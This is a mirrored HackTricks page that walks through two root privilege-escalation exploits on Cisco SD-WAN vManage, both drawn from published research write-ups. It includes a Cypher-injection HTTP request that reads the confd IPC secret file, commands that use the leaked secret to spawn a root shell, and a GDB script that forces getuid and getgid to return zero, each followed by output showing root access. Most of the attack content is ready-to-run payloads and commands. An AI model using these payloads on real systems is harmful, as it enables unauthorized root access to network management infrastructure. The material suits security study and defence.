mirror of https://github.com/carlospolop/hacktricks (synced 2024-12-22 19:13:39 +00:00)

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

# Path 1

(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))

After digging a little through some [documentation](http://66.218.245.39/doc/html/rn03re18.html) related to `confd` and the different binaries (accessible with an account on the Cisco website), we found that to authenticate the IPC socket, it uses a secret located in `/etc/confd/confd_ipc_secret`:

```
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
```

Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability:

```
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net

[...]

"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
```

The `confd_cli` program does not support command line arguments but calls `/usr/bin/confd_cli_user` with arguments. So, we could directly call `/usr/bin/confd_cli_user` with our own set of arguments. However, it's not readable with our current privileges, so we have to retrieve it from the rootfs and copy it using scp, read the help, and use it to get the shell:

```
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
```

# Path 2

(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))

The blog¹ by the synacktiv team described an elegant way to get a root shell, but the caveat is that it requires getting a copy of `/usr/bin/confd_cli_user`, which is only readable by root. I found another way to escalate to root without such hassle.

When I disassembled the `/usr/bin/confd_cli` binary, I observed the following:

```
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
  40165c: 48 89 c3               mov    %rax,%rbx
  40165f: bf 1c 31 40 00         mov    $0x40311c,%edi
  401664: e8 17 f8 ff ff         callq  400e80 <getenv@plt>
  401669: 49 89 c4               mov    %rax,%r12
  40166c: 48 85 db               test   %rbx,%rbx
  40166f: b8 dc 30 40 00         mov    $0x4030dc,%eax
  401674: 48 0f 44 d8            cmove  %rax,%rbx
  401678: 4d 85 e4               test   %r12,%r12
  40167b: b8 e6 30 40 00         mov    $0x4030e6,%eax
  401680: 4c 0f 44 e0            cmove  %rax,%r12
  401684: e8 b7 f8 ff ff         callq  400f40 <getuid@plt>   <-- HERE
  401689: 89 85 50 e8 ff ff      mov    %eax,-0x17b0(%rbp)
  40168f: e8 6c f9 ff ff         callq  401000 <getgid@plt>   <-- HERE
  401694: 89 85 44 e8 ff ff      mov    %eax,-0x17bc(%rbp)
  40169a: 8b bd 68 e8 ff ff      mov    -0x1798(%rbp),%edi
  4016a0: e8 7b f9 ff ff         callq  401020 <ttyname@plt>
  4016a5: c6 85 cf f7 ff ff 00   movb   $0x0,-0x831(%rbp)
  4016ac: 48 85 c0               test   %rax,%rax
  4016af: 0f 84 ad 03 00 00      je     401a62 <socket@plt+0x952>
  4016b5: ba ff 03 00 00         mov    $0x3ff,%edx
  4016ba: 48 89 c6               mov    %rax,%rsi
  4016bd: 48 8d bd d0 f3 ff ff   lea    -0xc30(%rbp),%rdi
  4016c4: e8 d7 f7 ff ff         callq  400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
```

When I ran “ps aux”, I observed the following (_note -g 100 -u 107_):
```
|
||
vmanage:~$ ps aux
|
||
… snipped …
|
||
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
|
||
… snipped …
|
||
```
|
||
|
||
I hypothesized that the “confd_cli” program passes the user ID and group ID it collected from the logged-in user to the “cmdptywrapper” application.

My first attempt was to run “cmdptywrapper” directly, supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it.

As mentioned in synacktiv’s blog (last example), the `confd_cli` program does not support command line arguments, but I can influence it with a debugger, and fortunately GDB is included on the system.

I created a GDB script where I forced the API calls `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read `/etc/confd/confd_ipc_secret` directly.

root.gdb:

```
set environment USER=root
define root
  finish
  set $rax=0
  continue
end
break getuid
commands
  root
end
break getgid
commands
  root
end
run
```

Console Output:

```
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000

Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59	T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()

Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59	T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()

Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59	T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
```
